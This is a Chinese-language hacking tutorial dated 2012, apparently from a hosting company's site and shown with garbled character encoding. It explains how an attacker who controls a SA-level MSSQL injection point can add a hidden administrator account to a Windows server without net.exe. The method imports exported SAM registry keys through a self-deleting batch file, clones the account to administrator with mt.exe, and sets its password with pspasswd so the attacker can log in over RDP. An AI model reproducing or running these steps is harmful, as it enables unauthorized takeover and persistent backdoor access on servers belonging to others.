實現(xiàn)無net.exe和net1.exe添加系統(tǒng)用戶
更新時間:2012-03-31 | 發(fā)布人:本站 | 點擊率:374 次
大家都知道在windows下添加用戶可以在CMD下用net命令來實現(xiàn)
格式為:net user username password /add
意思為添加一個用戶名為username密碼為password的用戶
如果要添加進(jìn)管理員組還可以用如下命令來實現(xiàn)
net localgroup administrators username /add
這樣就把用戶名為username的用戶加進(jìn)了管理員組
但是如果不用net.exe和net1.exe是不是就無法添加系統(tǒng)用戶了呢?
答案是否定的!
假設(shè)我們現(xiàn)在手上有一個SA權(quán)限的MSSQL注入點
3389開放并允許連接登錄
可以通過注入工具執(zhí)行任意命令
但是管理員把net.exe和net1.exe改名或者直接刪除掉了
當(dāng)然這樣是可以通過上傳自己的net.exe和net1.exe再執(zhí)行添加用戶命令
但是為了說明這種方法,我們不采用上傳net.exe和net1.exe的方法來解決!
首先要做的就是本地新建一個用戶
比如在本地添加一個用戶名為hackest的用戶
然后導(dǎo)出如下注冊表內(nèi)容:
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\hackest
保存為hackest.reg
再導(dǎo)出注冊表內(nèi)容:
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\下與hackest相對應(yīng)的鍵值
比如是000003F6
就導(dǎo)出:
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\000003F6
保存為000003F6.reg
然后再寫一個批處理文件,名為add.bat
add.bat文件內(nèi)容如下:
regedit /s hackest.reg
regedit /s 000003F6.reg
del hackest.reg
del 000003F6.reg
del add.bat
把這三個文件:hackest.reg、000003F6.reg、add.bat傳到目標(biāo)服務(wù)器上
運行add.bat文件
上傳mt.exe運行mt -chkuser命令
我們會發(fā)現(xiàn)已經(jīng)成功添加了一個用戶名為hackest的用戶
但是它并不屬于任何成員組
所以得把它克隆成管理員
假設(shè)管理員用戶為administrator,則命令為:
mt -clone administrator hackest
成功克隆為管理員后是不是就可以登錄3389了呢?
其實現(xiàn)在還不可以的
因為這個用戶的密碼問題還沒有解決
我們可以用PS系列工具中的pspasswd.exe來解決密碼問題
命令格式為:
pspasswd.exe username newpassword
在此例中命令則為:
pspasswd.exe hackest hackest
這樣就把用戶名為hackest的用戶密碼更改為hackest了
現(xiàn)在你可以放心地去連接登錄3389了,呵呵
其實完全可以通過上傳net.exe或net1.exe再執(zhí)行添加用戶的操作來達(dá)到目的
不過在這里只是為大家提供一個完全可以不用那兩個文件一樣能添加用戶的思路
渝公網(wǎng)安備 50024202000196號
域名注冊知識
虛擬主機知識
網(wǎng)站建設(shè)知識
網(wǎng)絡(luò)推廣知識
網(wǎng)絡(luò)營銷知識
常見技術(shù)問題
QQ空間
新浪微博
開心網(wǎng)
人人網(wǎng)